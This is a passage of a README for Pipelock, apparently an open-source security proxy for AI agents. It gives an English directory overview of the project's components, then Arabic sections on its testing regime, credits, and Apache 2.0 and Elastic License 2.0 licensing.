scanner/ Ordered URL scanning pipeline + response injection detection
audit/ Structured JSON logging (zerolog) + event emission dispatch
proxy/ HTTP proxy: fetch, forward (CONNECT), WebSocket, DNS pinning, TLS
mcp/ MCP proxy + bidirectional scanning + tool poisoning + chains
integrity/ MCP binary/script integrity manifests and trust workflow
discover/ IDE/agent config discovery (Claude Code, Cursor, VS Code, JetBrains)
killswitch/ Emergency deny-all (6 sources) + port-isolated API
envelope/ Mediation envelope (RFC 8941) for sideband metadata
media/ Image metadata stripping (JPEG/PNG byte-level surgery)
normalize/ Text-normalization transforms (NFKC, invisible chars, leetspeak, whitespace, vowel-fold) for the scanner cascade
receipt/ Action receipt signing + hash-chained evidence
posture/ Posture capsule schema, signing, scoring, verify policy
session/ Session state, taint classification, task boundaries, trust overrides
rules/ Bundle loader, tier taxonomy, RequiredFeatures enforcement
sandbox/ Landlock, seccomp, netns, macOS sandbox-exec
shield/ Airlock, browser shield, SVG hardening
signing/ Ed25519 key management
integrity/ SHA256 file integrity monitoring
report/ HTML/JSON audit report generation
enterprise/ Multi-agent features (ELv2)
sdk/conformance/ Cross-implementation receipt verification test vectors
charts/ Helm chart for Kubernetes deployment
configs/ 7 built-in preset config files
docs/ Guides, references, compliance mappings
الاختبارات
يتم اختبار Pipelock كمنتج أمني. يحتوي النواة مفتوحة المصدر على اختبارات الوحدة والتكامل والاختبارات الشاملة. تحتوي مجموعة هجومية خاصة منفصلة على تمارين لفئات الهجوم ضد النسخة الثنائية الإنتاجية. كل تجاوز يتم ترقيته إلى اختبار انحداري قبل الإصدار.
| المقياس | القيمة |
|---|---|
اختبارات Go (باستخدام -race) | مسارات الوحدة والتكامل والاختبارات الشاملة |
| عتبة التغطية (codecov) | 91% لمشروع النواة (Apache-2.0)، 95% للتصحيحات على الشيفرة الجديدة |
| تغطية التجاوز | مصفوفة مقاومة التجاوز العامة + مجموعة هجومية خاصة |
| الحمل الزائد للمسار السريع للماسح الضوئي | ~40us لكل مسح URL (اختبار المسار السريع؛ انظر docs/performance.md) |
| مصفوفة CI | Go 1.25 + 1.26, CodeQL, golangci-lint |
| سلسلة التوريد | SLSA provenance, CycloneDX SBOM, cosign signatures |
قم بتشغيل make test للتحقق محليًا. اختبار مرجعي مستقل: المجموعة العامة agent-egress-bench. انظر النتائج المباشرة.
الإشادات
- تأثرت البنية المعمارية بـ حماية بيئة Claude Code من Anthropic و sandbox-runtime
- تم تصميم نموذج التهديد بناءً على قائمة OWASP العليا للذكاء الاصطناعي الوكيل
- انظر docs/comparison.md لمعرفة كيفية ارتباط Pipelock بالأدوات الأخرى في هذا المجال
- مساهمات مراجعة الأمان من Dylan Corrales
نرحب بالمساهمات. انظر CONTRIBUTING.md للإرشادات.
إذا كان Pipelock مفيدًا، فيرجى وضع نجمة على هذا المستودع. فهذا يساعد الآخرين على العثور على المشروع.
الترخيص
نواة Pipelock مرخصة بموجب رخصة Apache 2.0. حقوق النشر 2026 Joshua Waldrep.
الميزات متعددة الوكلاء (هوية كل وكيل، الميزانيات، وعزل التهيئة) موجودة في دليل enterprise/، مقيدة بعلامة البناء enterprise ومرخصة بموجب رخصة Elastic License 2.0 (ELv2). يتم تفعيل هذه الميزات بمفتاح ترخيص صالح.
تعمل النواة مفتوحة المصدر بشكل مستقل دون ميزات مدفوعة. جميع عمليات المسح والكشف وحماية الوكيل الواحد مجانية.
تتضمن القطع الأثرية المعدة مسبقًا للإصدار (Homebrew, GitHub releases, Docker images) شيفرة الطبقة المدفوعة التي يتم تفعيلها بمفتاح ترخيص صالح. البناء من المصدر باستخدام go install أو ملف Dockerfile للمستودع ينتج نسخة ثنائية للمجتمع فقط.
انظر LICENSE لنص رخصة Apache 2.0 و enterprise/LICENSE لنص رخصة ELv2.